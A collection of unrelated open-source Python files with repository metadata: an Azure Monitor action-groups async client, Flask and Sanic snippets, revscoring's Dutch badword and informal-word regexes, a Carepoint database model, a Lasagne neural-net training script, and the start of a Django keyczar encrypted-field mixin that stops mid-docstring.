# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ActionGroupsOperations:
"""ActionGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~$(python-base-namespace).v2018_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create_or_update(
self,
resource_group_name: str,
action_group_name: str,
action_group: "_models.ActionGroupResource",
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Create a new action group or update an existing one.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param action_group: The action group to create or use for the update.
:type action_group: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(action_group, 'ActionGroupResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def get(
self,
resource_group_name: str,
action_group_name: str,
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Get an action group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
action_group_name: str,
**kwargs: Any
) -> None:
"""Delete an action group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
async def update(
self,
resource_group_name: str,
action_group_name: str,
action_group_patch: "_models.ActionGroupPatchBody",
**kwargs: Any
) -> "_models.ActionGroupResource":
"""Updates an existing action group's tags. To update other fields use the CreateOrUpdate method.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param action_group_patch: Parameters supplied to the operation.
:type action_group_patch: ~$(python-base-namespace).v2018_03_01.models.ActionGroupPatchBody
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ActionGroupResource, or the result of cls(response)
:rtype: ~$(python-base-namespace).v2018_03_01.models.ActionGroupResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(action_group_patch, 'ActionGroupPatchBody')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ActionGroupResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}'} # type: ignore
def list_by_subscription_id(
self,
**kwargs: Any
) -> AsyncIterable["_models.ActionGroupList"]:
"""Get a list of all action groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ActionGroupList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2018_03_01.models.ActionGroupList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription_id.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ActionGroupList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/microsoft.insights/actionGroups'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ActionGroupList"]:
"""Get a list of all action groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ActionGroupList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2018_03_01.models.ActionGroupList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ActionGroupList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ActionGroupList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups'} # type: ignore
async def enable_receiver(
self,
resource_group_name: str,
action_group_name: str,
enable_request: "_models.EnableRequest",
**kwargs: Any
) -> None:
"""Enable a receiver in an action group. This changes the receiver's status from Disabled to
Enabled. This operation is only supported for Email or SMS receivers.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param action_group_name: The name of the action group.
:type action_group_name: str
:param enable_request: The receiver to re-enable.
:type enable_request: ~$(python-base-namespace).v2018_03_01.models.EnableRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.enable_receiver.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'actionGroupName': self._serialize.url("action_group_name", action_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(enable_request, 'EnableRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 409]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
enable_receiver.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}/subscribe'} # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2018_03_01/aio/operations/_action_groups_operations.py
|
Python
|
mit
| 24,867
|
from database import init_db
from flask import Flask
from flask_graphql import GraphQLView
from schema import schema
app = Flask(__name__)
app.debug = True
default_query = '''
{
allEmployees {
edges {
node {
id,
name,
department {
id,
name
},
role {
id,
name
}
}
}
}
}'''.strip()
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
if __name__ == '__main__':
init_db()
app.run()
|
yfilali/graphql-pynamodb
|
examples/flask_pynamodb/app.py
|
Python
|
mit
| 552
|
from .features import Dictionary, RegexMatches, Stemmed, Stopwords
name = "dutch"
try:
import enchant
dictionary = enchant.Dict("nl")
except enchant.errors.DictNotFoundError:
raise ImportError("No enchant-compatible dictionary found for 'nl'. " +
"Consider installing 'myspell-nl'.")
dictionary = Dictionary(name + ".dictionary", dictionary.check)
"""
:class:`~revscoring.languages.features.Dictionary` features via
:class:`enchant.Dict` "nl". Provided by `myspell-nl`
"""
try:
from nltk.corpus import stopwords as nltk_stopwords
stopwords = set(nltk_stopwords.words('dutch'))
except LookupError:
raise ImportError("Could not load stopwords for {0}. ".format(__name__) +
"You may need to install the nltk 'stopwords' " +
"corpora. See http://www.nltk.org/data.html")
stopwords = Stopwords(name + ".stopwords", stopwords)
"""
:class:`~revscoring.languages.features.Stopwords` features provided by
:func:`nltk.corpus.stopwords` "dutch"
"""
try:
from nltk.stem.snowball import SnowballStemmer
stemmer = SnowballStemmer("dutch")
except ValueError:
raise ImportError("Could not load stemmer for {0}. ".format(__name__))
stemmed = Stemmed(name + ".stemmed", stemmer.stem)
"""
:class:`~revscoring.languages.features.Stemmed` word features via
:class:`nltk.stem.snowball.SnowballStemmer` "dutch"
"""
badword_regexes = [
r"aars",
r"an(aal|us)\w*",
r"balhaar",
r"drol(len)?",
r"fack(en|ing|s)?", "facking",
r"flikkers?",
r"focking",
r"ge(ile?|lul)",
r"geneukt",
r"hoer(en?)?",
r"homos?",
r"kaka?",
r"kak(hoofd|ken)",
r"k[ae]nker",
r"klootzak(ken)?",
r"klote",
r"kont(gat|je)?",
r"pedo",
r"penis(sen)?",
r"peop",
r"piemels?",
r"pijpen",
r"pik",
r"pimel",
r"pipi",
r"poep(chinees?|en|hoofd)?",
r"poep(ie|je|sex|te?)s?",
r"porno?",
r"neuke?",
r"neuken(de)?",
r"neukt(en?)?",
r"stron(d|t)",
r"suck(s|t)?",
r"zuigt",
r"sukkels?",
r"ter(ing|ten)", "tetten",
r"tieten",
r"vagina",
r"verekte",
r"verkracht",
r"dikzak",
r"dildo",
r"mon?g(olen|ool)?", "mooiboy",
r"negers?",
r"shit",
r"sperma",
r"kut(jes?)?",
r"stelletje",
r"losers?",
r"lul(len)?",
r"reet",
r"scheet", "scheten", r"schijt",
r"diaree",
r"slet",
r"lekkerding",
r"likken"
]
badwords = RegexMatches(name + ".badwords", badword_regexes)
"""
:class:`~revscoring.languages.features.RegexMatches` features via a list of
badword detecting regexes.
"""
informal_regexes = [
r"aap(jes)?",
r"banaan",
r"bent",
r"boe(it)?",
r"doei"
r"dombo",
r"domme",
r"eigelijk",
r"godverdomme",
r"groetjes",
r"gwn",
r"hoi",
r"hal+o+",
r"heb",
r"hee+[jyl]", r"heee+?l",
r"houd?",
r"(?:hoi+)+",
r"hoor",
r"izan",
r"jij",
r"jou",
r"jullie",
r"kaas",
r"klopt",
r"kots",
r"kusjes",
r"le?kke?re?",
r"maarja",
r"mama",
r"nou",
r"oma",
r"ofzo",
r"oke",
r"sexy?",
r"snap",
r"stink(en|t)",
r"stoer",
r"swag",
r"swek",
r"vies", "vieze",
r"vind",
r"vuile",
r"xxx",
r"yeah",
r"zielig",
r"zooi",
r"yolo",
r"zeg"
]
informals = RegexMatches(name + ".informals", informal_regexes)
"""
:class:`~revscoring.languages.features.RegexMatches` features via a list of
informal word detecting regexes.
"""
|
yafeunteun/wikipedia-spam-classifier
|
revscoring/revscoring/languages/dutch.py
|
Python
|
mit
| 3,534
|
# -*- coding: utf-8 -*-
# Copyright 2015-TODAY LasLabs Inc.
# License MIT (https://opensource.org/licenses/MIT).
from carepoint import Carepoint
from sqlalchemy import (Column,
Integer,
Boolean,
ForeignKey,
)
class FdbPemMogc(Carepoint.BASE):
__tablename__ = 'fdrpemogc'
__dbname__ = 'cph'
gcn_seqno = Column(
Integer,
primary_key=True,
autoincrement=False,
)
pemono = Column(
Integer,
ForeignKey('fdrpemmoe.pemono'),
primary_key=True,
)
update_yn = Column(Boolean)
|
laslabs/Python-Carepoint
|
carepoint/models/cph/fdb_pem_mogc.py
|
Python
|
mit
| 643
|
from .sanic import Sanic
from .blueprints import Blueprint
__version__ = '0.1.9'
__all__ = ['Sanic', 'Blueprint']
|
hhstore/flask-annotated
|
sanic/sanic-0.1.9/sanic/__init__.py
|
Python
|
mit
| 116
|
# code adapted from lasagne tutorial
# http://lasagne.readthedocs.org/en/latest/user/tutorial.html
import time
import os
from itertools import product
import numpy as np
from sklearn.cross_validation import KFold
import theano
from theano import tensor as T
import lasagne
from params import nnet_params_dict, feats_train_folder
def set_trace():
from IPython.core.debugger import Pdb
import sys
Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
def build_network(input_var, input_shape, nonlins, depth=2,
widths=(1000, 1000, 10), drops=(0.2, 0.5)):
"""
Parameters
----------
input_var : Theano symbolic variable or None (default: None)
Variable representing a network input.
input_shape : tuple of int or None (batchsize, rows, cols)
input_shape of the input. Any element can be set to None to indicate
that dimension is not fixed at compile time
"""
# GlorotUniform is the default mechanism for initializing weights
for i in range(depth):
if i == 0:
network = lasagne.layers.InputLayer(shape=input_shape,
input_var=input_var)
else:
network = lasagne.layers.DenseLayer(network,
widths[i],
nonlinearity=nonlins[i])
if drops[i] != None:
network = lasagne.layers.DropoutLayer(network, p=drops[i])
return network
def floatX(X):
return np.asarray(X, dtype=theano.config.floatX)
def zerosX(X):
return np.zeros(X, dtype=theano.config.floatX)
def init_weights(shape):
return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, gamma):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
updates.append([p, p - g * gamma])
return updates
def model(X, w_h, w_o):
h = T.nnet.sigmoid(T.dot(X, w_h))
pyx = T.nnet.softmax(T.dot(h, w_o))
return pyx
def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
assert len(inputs) == len(targets)
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
yield inputs[excerpt], targets[excerpt]
def batch_ids(batch_size, x_train, train_idx):
# change to iterator
ids = zip(range(0, len(x_train[train_idx]), batch_size),
range(batch_size, len(x_train[train_idx]), batch_size))
return ids
verbose = True
# train on every perturbed dataset
filepaths = np.loadtxt("include_data.csv", dtype=object, delimiter=",")
for (include, train_filename, test_filename) in filepaths:
if include == '1':
print '\nExecuting {}'.format(train_filename)
# Load training and test sets
x_train = np.load(os.path.join(feats_train_folder,
train_filename)).astype(np.float32)
y_train = x_train[:, -1].astype(int)
# y_train = (np.eye(2, dtype=np.float32)[x_train[:,-1].astype(int)])
# remove label column from x_train
x_train = x_train[:, :-1]
# Network topology
n_obs = x_train.shape[0]
n_inputs = x_train.shape[1]
n_outputs = len(np.unique(y_train))
# Cross-validation and Neural Net parameters
n_folds = nnet_params_dict['n_folds']
alphas = nnet_params_dict['alphas']
gammas = nnet_params_dict['gammas']
decay_rate = nnet_params_dict['decay_rate']
batch_sizes = nnet_params_dict['batch_sizes']
max_epoch = nnet_params_dict['max_epoch']
depth = nnet_params_dict['depth']
widths = nnet_params_dict['widths']
nonlins = nnet_params_dict['nonlins']
drops = nnet_params_dict['drops']
# Dictionary to store results
results_dict = {}
params_mat = [x for x in product(alphas, gammas, batch_sizes)]
params_mat = np.array(params_mat, dtype=theano.config.floatX)
params_mat = np.column_stack((params_mat,
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0])))
for param_idx in xrange(params_mat.shape[0]):
# load parameters for neural network model
alpha = params_mat[param_idx, 0]
gamma = params_mat[param_idx, 1]
batch_size = int(params_mat[param_idx, 2])
shape = (batch_size, x_train.shape[1])
# choose n_hidden nodes according to ...
n_hidden = int((n_obs / depth) / (alpha*(n_inputs+n_outputs)))
for i in range(1, depth-1):
widths[i] = n_hidden
model_str = ('\nalpha {} gamma {} batch size {} '
'n_hidden {} depth {}'
'\nnonlins {}'
'\ndrops {}'.format(alpha, gamma, batch_size,
n_hidden, depth, nonlins,
drops))
print model_str
# specify input and target theano data types
input_var = T.fmatrix('input')
target_var = T.ivector('target')
# build neural network model
network = build_network(input_var, shape, nonlins, depth, widths,
drops)
# create loss expression for training
"""
py_x = model(input_var, w_h, w_o)
y_x = T.argmax(py_x, axis=1)
cost = T.mean(T.nnet.categorical_crossentropy(py_x, target_var),
dtype=theano.config.floatX)
"""
prediction = lasagne.layers.get_output(network)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var)
loss = loss.mean()
# create paraneter update expressions for training
"""
params = [w_h, w_o]
updates = sgd(cost, params, gamma=gamma)
"""
params = lasagne.layers.get_all_params(network, trainable=True)
updates = lasagne.updates.adadelta(loss, params,
learning_rate=gamma,
rho=decay_rate)
# create loss expression for validation and classification accuracy
# Deterministic forward pass to disable droupout layers
test_prediction = lasagne.layers.get_output(network,
deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(
test_prediction,
target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1),
target_var), dtype=theano.config.floatX)
# compile functions for performing training step and returning
# corresponding training loss
train_fn = theano.function(inputs=[input_var, target_var],
outputs=loss,
updates=updates,
allow_input_downcast=True)
# compile a function to compute the validation loss and accuracy
val_fn = theano.function(inputs=[input_var, target_var],
outputs=[test_loss, test_acc],
allow_input_downcast=True)
# create kfold iterator
kf = KFold(x_train.shape[0], n_folds=n_folds)
error_rates = []
val_losses = []
running_time = []
fold = 1
for train_idx, val_idx in kf:
start_time = time.time()
for i in range(max_epoch):
train_err = 0
train_batches = 0
for start, end in batch_ids(batch_size, x_train,
train_idx):
train_err += train_fn(x_train[train_idx][start:end],
y_train[train_idx][start:end])
train_batches += 1
val_err = 0
val_acc = 0
val_batches = 0
for start, end in batch_ids(batch_size, x_train,
train_idx):
err, acc = val_fn(x_train[val_idx], y_train[val_idx])
val_err += err
val_acc += acc
val_batches += 1
error_rate = (1 - (val_acc / val_batches)) * 100
val_loss = val_err / val_batches
print("Final results:")
print(" val loss:\t\t\t{:.6f}".format(val_loss))
print(" val error rate:\t\t{:.2f} %".format(error_rate))
error_rates.append(error_rate)
val_losses.append(val_loss)
running_time.append(np.around((time.time() -
start_time) / 60., 1))
fold += 1
params_mat[param_idx, 3] = np.mean(error_rates)
params_mat[param_idx, 4] = np.mean(val_losses)
params_mat[param_idx, 5] = np.mean(running_time)
print('alpha {} gamma {} batchsize {} error rate {} '
'validation cost {} '
'running time {}'.format(params_mat[param_idx, 0],
params_mat[param_idx, 1],
params_mat[param_idx, 2],
params_mat[param_idx, 3],
params_mat[param_idx, 4],
params_mat[param_idx, 5]))
# Save params matrix to disk
params_mat.dump(('results/train/{}'
'_results.np').format(train_filename[:-3]))
|
rafaelvalle/MDI
|
nnet_lasagne.py
|
Python
|
mit
| 10,609
|
import os
import types
import binascii
from django.db import models
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import cached_property
try:
from django.utils.encoding import smart_text
except ImportError:
from django.utils.encoding import smart_str as smart_text
from keyczar import keyczar
class EncryptedFieldException(Exception):
pass
# Simple wrapper around keyczar to standardize the initialization
# of the crypter object and allow for others to extend as needed.
class KeyczarWrapper(object):
def __init__(self, keyname, *args, **kwargs):
self.crypter = keyczar.Crypter.Read(keyname)
def encrypt(self, cleartext):
return self.crypter.Encrypt(cleartext)
def decrypt(self, ciphertext):
return self.crypter.Decrypt(ciphertext)
class EncryptedFieldMixin(object, metaclass=models.SubfieldBase):
"""
EncryptedFieldMixin will use keyczar to encrypt/decrypt data that is being
marshalled in/out of the database into application Django model fields.
This is very helpful in ensuring that data at rest is encrypted and
minimizing the effects of SQL Injection or insider access to sensitive
databases containing sensitive information.
The most basic use of this mixin is to have a single encryption key for all
data in your database. This lives in a Keyczar key directory specified by:
the setting - settings.ENCRYPTED_FIELDS_KEYDIR -
Optionally, you can name specific encryption keys for data-specific purposes
in your model such as:
special_data = EncrytpedCharField( ..., keyname='special_data' )
The Mixin will handle the encryption/decryption seamlessly, but native
SQL queries may need a way to filter data that is encrypted. Using the
optional 'prefix' kwarg will prepend a static identifier to your encrypted
data before it is written to the database.
There are other use cases where you may not wish to encrypt all of the data
in a database. For example, if you have a survey application that allows
users to enter arbitrary questions and answers, users may request sensitive
information to be stored such as SSN, Driver License #, Credit Card, etc.
Your application can detect these sensitive fields, manually encrypt the
data and store that in the database mixed with other cleartext data.
The model should then only decrypt the specific fields needed. Use the
kwarg 'decrypt_only' to specify this behavior and the model will not
encrypt the data inbound and only attempt to decrypt outbound.
Encrypting data will significantly change the size of the data being stored
and this may cause issues with your database column size. Before storing
any encrypted data in your database, ensure that you have the proper
column width otherwise you may experience truncation of your data depending
on the database engine in use.
To have the mixin enforce max field length, either:
